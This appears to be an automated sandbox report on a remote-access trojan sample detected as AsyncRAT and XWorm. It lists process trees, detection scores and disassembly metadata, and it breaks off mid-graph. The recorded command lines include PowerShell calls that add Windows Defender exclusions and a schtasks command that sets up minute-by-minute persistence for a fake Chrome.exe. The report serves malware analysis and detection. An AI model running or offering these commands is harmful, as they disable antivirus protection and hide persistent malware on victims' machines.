                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: ditekSHen
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:05:04:54
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'
                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:05:04:54
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:05:05:08
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe'
                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:05:05:08
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:05:05:21
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'
                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:20
                                                                                                                  Start time:05:05:21
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:05:05:39
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe'
                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:05:05:39
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:05:06:04
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"
                                                                                                                  Imagebase:0x7ff60fac0000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:05:06:04
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:05:06:06
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                                  Imagebase:0x420000
                                                                                                                  File size:52'736 bytes
                                                                                                                  MD5 hash:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: ditekSHen
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:30
                                                                                                                  Start time:05:06:14
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Chrome.exe"
                                                                                                                  Imagebase:0xc90000
                                                                                                                  File size:52'736 bytes
                                                                                                                  MD5 hash:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:31
                                                                                                                  Start time:05:06:22
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Chrome.exe"
                                                                                                                  Imagebase:0xe30000
                                                                                                                  File size:52'736 bytes
                                                                                                                  MD5 hash:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:50%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:3.8%
                                                                                                                    Total number of Nodes:53
                                                                                                                    Total number of Limit Nodes:2
                                                                                                                    execution_graph 88 4014d1 memset SetUnhandledExceptionFilter __set_app_type _controlfp __getmainargs 91 40145b 88->91 90 401574 exit 92 401476 91->92 95 40108c 92->95 94 40149f 94->90 120 401000 malloc 95->120 98 401000 malloc 99 4010be 98->99 100 401000 malloc 99->100 101 4010d5 ShellExecuteA memset memset 100->101 102 4011a3 101->102 103 4013aa 102->103 104 4011c6 strcmp 102->104 103->94 105 4011f3 104->105 106 40123d 104->106 107 401000 malloc 105->107 108 401000 malloc 106->108 109 401225 strcpy 107->109 110 401269 getenv 108->110 111 4012c7 fopen 109->111 112 401000 malloc 110->112 114 401000 malloc 111->114 113 4012aa sprintf 112->113 113->111 115 401314 fwrite fclose 114->115 116 4013a5 115->116 117 40136c 115->117 116->94 118 401000 malloc 117->118 119 40137d ShellExecuteA 118->119 119->116 121 401031 120->121 121->98 122 401582 _controlfp 123 40108c 12 API calls 122->123 124 4015dc 123->124 125 4011b7 126 4011a3 125->126 127 4011c6 strcmp 125->127 126->127 128 4013aa 126->128 129 4011f3 127->129 130 40123d 127->130 131 401000 malloc 129->131 132 401000 malloc 130->132 133 401225 strcpy 131->133 134 401269 getenv 132->134 135 4012c7 fopen 133->135 136 401000 malloc 134->136 138 401000 malloc 135->138 137 4012aa sprintf 136->137 137->135 139 401314 fwrite fclose 138->139 140 4013a5 139->140 141 40136c 139->141 142 401000 malloc 141->142 143 40137d ShellExecuteA 142->143 143->140 144 4014af _XcptFilter

                                                                                                                    Callgraph

                                                                                                                    Executed Functions

                                                                                                                    Function 004014D1 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3649950142-0
                                                                                                                    • Opcode ID: d919a114d98266336884f140e47bd302947eef9c678e8b5ee46a87026b7dd41d
                                                                                                                    • Instruction ID: 5c8374e601bb470c3729058ffa5bbb1f79a7e2c4f5fccbe78a01980999ae235b
                                                                                                                    • Opcode Fuzzy Hash: d919a114d98266336884f140e47bd302947eef9c678e8b5ee46a87026b7dd41d
                                                                                                                    • Instruction Fuzzy Hash: E0113CF9E00104ABCB10FBA8DC85F4B77EDAB08304F450475F805E3365E939E9048B68
                                                                                                                    Function 0040108C Relevance: 33.5, APIs: 11, Strings: 8, Instructions: 239filestringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                    • String ID: ! @$%s\%s$& @$1 @$D`4wD`4w$`!@$h!@$o!@
                                                                                                                    • API String ID: 3236948872-1506132525
                                                                                                                    • Opcode ID: fb0314bb89e4bd09486ac8e0109c434c0390084252135cbf240de6d7b9b86a64
                                                                                                                    • Instruction ID: ddd33b2b7367e72d4b2ea49baa425b383fc80029fe05322618666ae03f79651f
                                                                                                                    • Opcode Fuzzy Hash: fb0314bb89e4bd09486ac8e0109c434c0390084252135cbf240de6d7b9b86a64
                                                                                                                    • Instruction Fuzzy Hash: A0811FF1E001149BDB14DBACDC55B9E77A9EB48309F04057AF109FB392E63DAE448B68
                                                                                                                    Function 004011B7 Relevance: 9.1, APIs: 6, Instructions: 113filestringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 98952953-0
                                                                                                                    • Opcode ID: 396f06f7f0b3d99925f8e6365d685a568df60c8fc8c39a5659122d7209982daa
                                                                                                                    • Instruction ID: 0752c36ba91bfafbf4fad5d93ced69d27afe32613dba049bda7c2a5235eee97d
                                                                                                                    • Opcode Fuzzy Hash: 396f06f7f0b3d99925f8e6365d685a568df60c8fc8c39a5659122d7209982daa
                                                                                                                    • Instruction Fuzzy Hash: 244147F0E105149BDB18D758DC51B9973A9EB84309F0405BDF106FB392D53CB989CB28
                                                                                                                    Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 49 401000-40102e malloc 50 401031-401039 49->50 51 401087-40108b 50->51 52 40103f-401085 50->52 52->50
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • +zr]j2!:c>*9-2g&b=g*<bt,//hrv<b<, xrefs: 0040106E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID: +zr]j2!:c>*9-2g&b=g*<bt,//hrv<b<
                                                                                                                    • API String ID: 2803490479-881568434
                                                                                                                    • Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                                                                                                                    • Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
                                                                                                                    • Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                                                                                                                    • Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45
                                                                                                                    Function 0040145B Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 55 40145b-4014ae call 4013b4 call 40108c call 401410
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ExecuteShellstrcmp
                                                                                                                    • String ID: D`4wD`4w$D`4wD`4w
                                                                                                                    • API String ID: 1389483452-3394693991
                                                                                                                    • Opcode ID: 9533a952e54bd6f8001f668a3f0dfa94ddbeed1e55bb20da68c2a9291ac6979b
                                                                                                                    • Instruction ID: 55a6438b5c1c20d3bee696981992d7166572ef050206657248e041b7fb238655
                                                                                                                    • Opcode Fuzzy Hash: 9533a952e54bd6f8001f668a3f0dfa94ddbeed1e55bb20da68c2a9291ac6979b
                                                                                                                    • Instruction Fuzzy Hash: C0F0F8B9A00208EFCB40EFA8D881E8A77F8AB4C308F014075F908D7354E634EA458B58

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:6.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:3
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 22475 8ee6828 22476 8ee686b SetThreadToken 22475->22476 22477 8ee6899 22476->22477

                                                                                                                    Executed Functions

                                                                                                                    Function 0361B550 Relevance: .3, Instructions: 261COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 829 361b550-361b589 831 361b58b 829->831 832 361b58e-361b8c9 call 361ad9c 829->832 831->832 893 361b8ce-361b8d5 832->893
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4653d39f55998c27e8c17cb7bf70ae65fe21ed1dcdca4510ee983f98b828567c
                                                                                                                    • Instruction ID: 114e4e4f35f446f9e3555affa46924e65fd85090830be53b3d762a22fc9d1b30
                                                                                                                    • Opcode Fuzzy Hash: 4653d39f55998c27e8c17cb7bf70ae65fe21ed1dcdca4510ee983f98b828567c
                                                                                                                    • Instruction Fuzzy Hash: B4919975B00B089FDB19EFB98410AAEBBF2FF84700B00896DE156AB350DF745A058BD5
                                                                                                                    Function 0361B570 Relevance: .3, Instructions: 252COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 894 361b570-361b589 895 361b58b 894->895 896 361b58e-361b8c9 call 361ad9c 894->896 895->896 957 361b8ce-361b8d5 896->957
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8a8ea73ca72985561ddd7bc91064f4860091401adca9be7b2c24e040f7b18cba
                                                                                                                    • Instruction ID: 1a5ba9d790a8b3094db7fe3cbc27b6e99b13a72df095d17f8a615a50be5f857f
                                                                                                                    • Opcode Fuzzy Hash: 8a8ea73ca72985561ddd7bc91064f4860091401adca9be7b2c24e040f7b18cba
                                                                                                                    • Instruction Fuzzy Hash: 01917A75B00B089FDB19EFB98411AAFBAF2FF84700B00896CE116AB350DF745A059BD5
                                                                                                                    Function 08EE6821 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 8ee6821-8ee6863 1 8ee686b-8ee6897 SetThreadToken 0->1 2 8ee6899-8ee689f 1->2 3 8ee68a0-8ee68bd 1->3 2->3
                                                                                                                    APIs
                                                                                                                    • SetThreadToken.KERNELBASE(EFC00899), ref: 08EE688A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1325661745.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8ee0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3254676861-0
                                                                                                                    • Opcode ID: 1d18afcd856493a97a78c37f1e7fda5c6c58744d0a2eee99cd29c72916ac6889
                                                                                                                    • Instruction ID: 36e3f41964afa79e14ac965f42b7bea1887fc37f03447fc6bab098664e60fcd8
                                                                                                                    • Opcode Fuzzy Hash: 1d18afcd856493a97a78c37f1e7fda5c6c58744d0a2eee99cd29c72916ac6889
                                                                                                                    • Instruction Fuzzy Hash: 071125B59003488FDB24DF9AD484BDEFBF4AF88324F24841DD459A7610D7B4A944CFA4
                                                                                                                    Function 08EE6828 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 6 8ee6828-8ee6897 SetThreadToken 8 8ee6899-8ee689f 6->8 9 8ee68a0-8ee68bd 6->9 8->9
                                                                                                                    APIs
                                                                                                                    • SetThreadToken.KERNELBASE(EFC00899), ref: 08EE688A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1325661745.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8ee0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3254676861-0
                                                                                                                    • Opcode ID: cf62d16e78fe38b81a5730d6f3fcdbe5f9224be23440d339e2b706394d85e6b2
                                                                                                                    • Instruction ID: fc13a54c43776fa694345467e4b2b08020f11d2202104b8664a17bf70ed92f5d
                                                                                                                    • Opcode Fuzzy Hash: cf62d16e78fe38b81a5730d6f3fcdbe5f9224be23440d339e2b706394d85e6b2
                                                                                                                    • Instruction Fuzzy Hash: 7E1125B59003088FDB10DF9AC884BDEFBF8EB48224F248419D418A7210D774A944CFA4
                                                                                                                    Function 07D72308 Relevance: .6, Instructions: 643COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1321281235.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7d70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35e5787ec2b454e40e8ef50530fd0190b8de0c6f1ce8576374d04a33e34cffe0
                                                                                                                    • Instruction ID: 4bdf4874f3cce96380668caabec80eca9677de4ed953ffa0c24b7f054a792a3f
                                                                                                                    • Opcode Fuzzy Hash: 35e5787ec2b454e40e8ef50530fd0190b8de0c6f1ce8576374d04a33e34cffe0
                                                                                                                    • Instruction Fuzzy Hash: 232214B1B002859FDB24DF6888417AAF7F6FF86321F0480AAD545DF251EA35ED41CBA1
                                                                                                                    Function 07D73CE8 Relevance: .6, Instructions: 586COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 219 7d73ce8-7d73d0d 220 7d73d13-7d73d18 219->220 221 7d73f00-7d73f4a 219->221 222 7d73d30-7d73d34 220->222 223 7d73d1a-7d73d20 220->223 229 7d73f50-7d73f55 221->229 230 7d740ce-7d740e9 221->230 227 7d73eb0-7d73eba 222->227 228 7d73d3a-7d73d3c 222->228 225 7d73d24-7d73d2e 223->225 226 7d73d22 223->226 225->222 226->222 231 7d73ebc-7d73ec5 227->231 232 7d73ec8-7d73ece 227->232 233 7d73d3e-7d73d4a 228->233 234 7d73d4c 228->234 236 7d73f57-7d73f5d 229->236 237 7d73f6d-7d73f71 229->237 249 7d74092-7d74094 230->249 250 7d740eb-7d74112 230->250 238 7d73ed4-7d73ee0 232->238 239 7d73ed0-7d73ed2 232->239 235 7d73d4e-7d73d50 233->235 234->235 235->227 247 7d73d56-7d73d75 235->247 241 7d73f61-7d73f6b 236->241 242 7d73f5f 236->242 245 7d73f77-7d73f79 237->245 246 7d74080-7d7408a 237->246 243 7d73ee2-7d73efd 238->243 239->243 241->237 242->237 251 7d73f7b-7d73f87 245->251 252 7d73f89 245->252 253 7d74097-7d7409d 246->253 254 7d7408c-7d74091 246->254 276 7d73d77-7d73d83 247->276 277 7d73d85 247->277 257 7d74228-7d74249 250->257 258 7d74118-7d7411d 250->258 259 7d73f8b-7d73f8d 251->259 252->259 261 7d740a3-7d740af 253->261 262 7d7409f-7d740a1 253->262 254->249 281 7d741f2-7d741f7 257->281 282 7d7424b-7d7425d 257->282 264 7d74135-7d74139 258->264 265 7d7411f-7d74125 258->265 259->246 266 7d73f93-7d73fb2 259->266 263 7d740b1-7d740cb 261->263 262->263 270 7d7413f-7d74141 264->270 271 7d741da-7d741e4 264->271 273 7d74127 265->273 274 7d74129-7d74133 265->274 299 7d73fb4-7d73fc0 266->299 300 7d73fc2 266->300 278 7d74143-7d7414f 270->278 279 7d74151 270->279 283 7d741e6-7d741ee 271->283 284 7d741f1 271->284 273->264 274->264 286 7d73d87-7d73d89 276->286 277->286 287 7d74153-7d74155 278->287 279->287 290 7d741fd-7d74209 281->290 291 7d741f9-7d741fb 281->291 288 7d7425f-7d74281 282->288 289 7d7428b-7d74295 282->289 284->281 286->227 293 7d73d8f-7d73d96 286->293 287->271 294 7d7415b-7d7415d 287->294 328 7d742d5-7d742fe 288->328 329 7d74283-7d74288 288->329 297 7d74297-7d7429c 289->297 298 7d7429f-7d742a5 289->298 296 7d7420b-7d74225 290->296 291->296 293->221 301 7d73d9c-7d73da1 293->301 302 7d74177-7d7417e 294->302 303 7d7415f-7d74165 294->303 306 7d742a7-7d742a9 298->306 307 